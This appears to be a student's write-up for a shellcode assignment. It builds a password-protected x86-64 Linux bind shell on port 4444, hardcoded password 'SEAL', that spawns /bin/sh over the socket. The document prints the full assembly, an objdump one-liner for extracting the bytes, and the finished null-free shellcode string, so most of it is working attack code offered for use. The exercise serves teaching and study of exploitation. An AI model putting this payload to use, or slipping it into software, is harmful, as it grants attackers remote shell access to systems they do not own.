Shell Bind TCP port
Requirements:
*Bind to a port
*Needs a password
*If password correct execs a shell
*Remove 0x00
Repository: https://github.com/Farad77/pentestAssign1.git
So for this first assignement, the idea was to put an authentification system to a tcp bind shell.
Socket initialisation
We will create a server socket, listening on port 4444, and when a client connect itself we will redirect it to the authentification part of the code
xor rax,rax
add al,41
xor rsi,rsi
add sil,1
xor rdi,rdi
add dil,2
xor rdx,rdx
syscall
mov rdi,rax ;socket server
xor rax,rax
push rax
;pour le bind il nous faut plusieurs données
;struct_addr: 8byte de 0 (push rax)
;l'adresse du serveur: ANY (0)
;le port codé en big endian (hton converti en hex)
;Le AF_INET=2
mov dword [rsp-04],eax
mov word [rsp-6],0x5c11 ;5c11=23569(BE)=4444(LE)
xor rax,rax
inc rax
inc rax
mov word [rsp-8],ax
sub rsp,8
;bind= syscall 49
xor rax,rax
add al,49
mov rsi,rsp
xor rdx,rdx
add dl,16
syscall ;port ouvert
;wait for client
;50 pour syscall
;rdi pour sock
;rsi max client
xor rax,rax
add al,50
xor rsi,rsi
add sil,2
syscall ;listen
;accept client
xor rax,rax
add al,43 ;number syscall
sub rsp,16
mov rsi,rsp ;pointeur
mov byte [rsp-1],16 ;adresse vers la valeur 16 pour le accept
dec rsp
mov rdx,rsp
syscall ;wait for client
mov r9,rax
jmp waitForPasswordNull bytes was taking care of by xoring register and adding values to low registers, converting mov rax,43 to xor rax,rax add al,43
So next part is auth. Idea is create a buffer for 5 chars, read the first byte of incoming socket and compare it to our hardcoded password: SEAL
;;;;jmpcallpop from waitforPassword (buffer for password)
getBufferAddr:
pop rsi ;retrieve pass adress
mov rdi,rax
xor rax,rax
xor rdx,rdx
add dl,40 ;read 64bytes
syscall ;read from socket
cmp dword [rsi],0x4c414553 ;compare it with SEAL
je auth_ok
xor rax, rax;exit
add rax, 60
xor rdi, rdi
syscall
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
waitForPassword:
call getBufferAddr
pass db "AAAAB" If password is incorrect, we exit. Next step is duplicate STDIN,OU,ERR and excev bin/sh
Launch_CommandProc: ;rbx=chaine de commande;
xor rax,rax
push rax
mov rdx,rsp
push rbx
mov rdi ,rsp
push rax
push rdi
mov rsi,rsp
add al,59
syscall
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;PASSWORD IS OK GET THE SHELL
auth_ok:
;duplicate socket
;dup2 0
mov rdi,r9
xor rax,rax
add al,33 ;dup2
xor rsi,rsi
syscall
;dup2 1
xor rax,rax
add al,33
xor rsi,rsi
add sil,1
syscall
;dup2 2
xor rax,rax
add al,33
xor rsi,rsi
add sil,2
syscall
xor rax,rax ;close socket
add al,3
syscall
;execv
; /bin//sh in reverse
mov rbx, 0x68732f2f6e69622f
call Launch_CommandProc
Here we go, objdump to verify that we have no null bytes, using
echo "\"$(objdump -d BindShell64.o | grep '[0-9a-f]:' | cut -d$'\t' -f2 | grep -v 'file' | tr -d " \n" | sed 's/../\\x&/g')\""
Give us our shell code in bytes
"\xeb\x54\x48\x31\xc0\x50\x48\x89\xe2\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x04\x3b\x0f\x05\xc3\x4c\x89\xcf\x48\x31\xc0\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x01\x0f\x05\x48\x31\xc0\x04\x21\x48\x31\xf6\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\x04\x03\x0f\x05\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\xe8\xac\xff\xff\xff\xeb\x2d\x5e\x48\x89\xc7\x48\x31\xc0\x48\x31\xd2\x80\xc2\x28\x0f\x05\x81\x3e\x53\x45\x41\x4c\x74\xa8\x48\x31\xc0\x48\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xd8\xff\xff\xff\x41\x41\x41\x41\x42\x48\x31\xc0\x04\x29\x48\x31\xf6\x40\x80\xc6\x01\x48\x31\xff\x40\x80\xc7\x02\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\x48\x31\xc0\x48\xff\xc0\x48\xff\xc0\x66\x89\x44\x24\xf8\x48\x83\xec\x08\x48\x31\xc0\x04\x31\x48\x89\xe6\x48\x31\xd2\x80\xc2\x10\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\x04\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\xff\xcc\x48\x89\xe2\x0f\x05\x49\x89\xc1\xe9\x7b\xff\xff\xff"
Passing it to our skeletton shellcode.c: Shell Code is 256 bytes, no null bytes, bind to port 4444 and need a password to get the shell